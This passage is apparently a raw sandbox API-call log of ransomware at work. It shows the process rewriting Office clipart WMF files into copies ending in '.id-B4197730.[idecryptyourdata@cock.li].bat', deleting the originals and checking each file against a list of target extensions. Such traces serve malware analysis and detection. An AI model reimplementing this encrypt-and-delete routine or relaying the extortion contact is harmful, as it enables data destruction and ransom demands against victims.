lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.693] SetEndOfFile (hFile=0x360) returned 1 [0181.694] CloseHandle (hObject=0x360) returned 1 [0181.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf")) returned 1 [0181.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.695] lstrlenW (lpString=".doc") returned 4 [0181.695] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.695] lstrlenW (lpString=".docx") returned 5 [0181.695] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0181.695] lstrlenW (lpString=".pdf") returned 4 [0181.695] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.695] lstrlenW (lpString=".xls") returned 4 [0181.695] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.695] lstrlenW (lpString=".xlsx") returned 5 [0181.695] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0181.695] lstrlenW (lpString=".ppt") returned 4 [0181.695] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.695] lstrlenW (lpString=".zip") returned 4 [0181.695] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.695] lstrlenW (lpString=".rar") returned 4 [0181.695] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.695] lstrlenW (lpString=".bz2") returned 4 [0181.695] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.695] lstrlenW (lpString=".7z") returned 3 [0181.695] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.695] lstrlenW (lpString=".dbf") returned 4 [0181.695] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString=".1cd") returned 4 [0181.696] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString=".jpg") returned 4 [0181.696] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString=".doc") returned 4 [0181.696] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString=".docx") returned 5 [0181.696] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0181.696] lstrlenW (lpString=".pdf") returned 4 [0181.696] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString=".xls") returned 4 [0181.696] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.696] lstrlenW (lpString=".xlsx") returned 5 [0181.696] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0181.696] lstrlenW (lpString=".ppt") returned 4 [0181.696] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString=".zip") returned 4 [0181.696] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.696] lstrlenW (lpString=".rar") returned 4 [0181.696] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString=".bz2") returned 4 [0181.696] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString=".7z") returned 3 [0181.696] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString=".dbf") returned 4 [0181.696] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.696] lstrlenW (lpString=".1cd") returned 4 [0181.696] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF") returned 68 [0181.697] lstrlenW (lpString=".jpg") returned 4 [0181.697] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.697] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.697] lstrlenW (lpString="J0105388.WMF") returned 12 [0181.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0181.697] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=8252) returned 1 [0181.698] CloseHandle (hObject=0x360) returned 1 [0181.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf")) returned 0x220 [0181.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0181.698] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.698] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0181.699] GetLastError () returned 0x0 [0181.699] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x203c, lpOverlapped=0x0) returned 1 [0181.774] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2040, lpOverlapped=0x0) returned 1 [0182.155] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.155] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.155] SetEndOfFile (hFile=0x368) returned 1 [0182.155] CloseHandle (hObject=0x368) returned 1 [0182.156] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.156] SetEndOfFile (hFile=0x360) returned 1 [0182.157] CloseHandle (hObject=0x360) returned 1 [0182.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.157] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf")) returned 1 [0182.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.157] lstrlenW (lpString=".doc") returned 4 [0182.157] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.157] lstrlenW (lpString=".docx") returned 5 [0182.157] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.157] lstrlenW (lpString=".pdf") returned 4 [0182.157] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.157] lstrlenW (lpString=".xls") returned 4 [0182.157] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.158] lstrlenW (lpString=".xlsx") returned 5 [0182.158] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.158] lstrlenW (lpString=".ppt") returned 4 [0182.158] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.158] lstrlenW (lpString=".zip") returned 4 [0182.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.158] lstrlenW (lpString=".rar") returned 4 [0182.158] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString=".bz2") returned 4 [0182.158] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString=".7z") returned 3 [0182.158] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.158] lstrlenW (lpString=".dbf") returned 4 [0182.158] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.158] lstrlenW (lpString=".1cd") returned 4 [0182.158] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.158] lstrlenW (lpString=".jpg") returned 4 [0182.158] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.158] lstrlenW (lpString=".doc") returned 4 [0182.158] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString=".docx") returned 5 [0182.158] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.158] lstrlenW (lpString=".pdf") returned 4 [0182.158] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.158] lstrlenW (lpString=".xls") returned 4 [0182.159] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.159] lstrlenW (lpString=".xlsx") returned 5 [0182.159] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.159] lstrlenW (lpString=".ppt") returned 4 [0182.159] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.159] lstrlenW (lpString=".zip") returned 4 [0182.159] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.159] lstrlenW (lpString=".rar") returned 4 [0182.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.159] lstrlenW (lpString=".bz2") returned 4 [0182.159] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.159] lstrlenW (lpString=".7z") returned 3 [0182.159] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.159] lstrlenW (lpString=".dbf") returned 4 [0182.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.159] lstrlenW (lpString=".1cd") returned 4 [0182.159] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 68 [0182.159] lstrlenW (lpString=".jpg") returned 4 [0182.159] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.159] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.159] lstrlenW (lpString="J0105520.WMF") returned 12 [0182.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.160] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=31812) returned 1 [0182.160] CloseHandle (hObject=0x360) returned 1 [0182.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf")) returned 0x220 [0182.160] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.161] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.161] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.161] GetLastError () returned 0x0 [0182.162] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x7c44, lpOverlapped=0x0) returned 1 [0182.164] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x7c50, lpOverlapped=0x0) returned 1 [0182.166] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.166] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.166] SetEndOfFile (hFile=0x368) returned 1 [0182.166] CloseHandle (hObject=0x368) returned 1 [0182.166] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.166] SetEndOfFile (hFile=0x360) returned 1 [0182.167] CloseHandle (hObject=0x360) returned 1 [0182.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.167] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf")) returned 1 [0182.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.168] lstrlenW (lpString=".doc") returned 4 [0182.168] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString=".docx") returned 5 [0182.168] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.168] lstrlenW (lpString=".pdf") returned 4 [0182.168] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString=".xls") returned 4 [0182.168] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.168] lstrlenW (lpString=".xlsx") returned 5 [0182.168] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.168] lstrlenW (lpString=".ppt") returned 4 [0182.168] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.168] lstrlenW (lpString=".zip") returned 4 [0182.168] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.168] lstrlenW (lpString=".rar") returned 4 [0182.168] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString=".bz2") returned 4 [0182.168] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString=".7z") returned 3 [0182.168] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.168] lstrlenW (lpString=".dbf") returned 4 [0182.168] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.168] lstrlenW (lpString=".1cd") returned 4 [0182.168] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.168] lstrlenW (lpString=".jpg") returned 4 [0182.168] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.169] lstrlenW (lpString=".doc") returned 4 [0182.169] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString=".docx") returned 5 [0182.169] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.169] lstrlenW (lpString=".pdf") returned 4 [0182.169] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString=".xls") returned 4 [0182.169] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.169] lstrlenW (lpString=".xlsx") returned 5 [0182.169] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.169] lstrlenW (lpString=".ppt") returned 4 [0182.169] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.169] lstrlenW (lpString=".zip") returned 4 [0182.169] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.169] lstrlenW (lpString=".rar") returned 4 [0182.169] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString=".bz2") returned 4 [0182.169] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString=".7z") returned 3 [0182.169] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.169] lstrlenW (lpString=".dbf") returned 4 [0182.169] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.169] lstrlenW (lpString=".1cd") returned 4 [0182.169] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 68 [0182.169] lstrlenW (lpString=".jpg") returned 4 [0182.169] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.170] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.170] lstrlenW (lpString="J0105526.WMF") returned 12 [0182.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.170] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=17332) returned 1 [0182.171] CloseHandle (hObject=0x360) returned 1 [0182.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf")) returned 0x220 [0182.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.171] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.171] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.172] GetLastError () returned 0x0 [0182.172] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x43b4, lpOverlapped=0x0) returned 1 [0182.174] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x43c0, lpOverlapped=0x0) returned 1 [0182.175] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.175] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.176] SetEndOfFile (hFile=0x368) returned 1 [0182.176] CloseHandle (hObject=0x368) returned 1 [0182.176] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.176] SetEndOfFile (hFile=0x360) returned 1 [0182.177] CloseHandle (hObject=0x360) returned 1 [0182.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 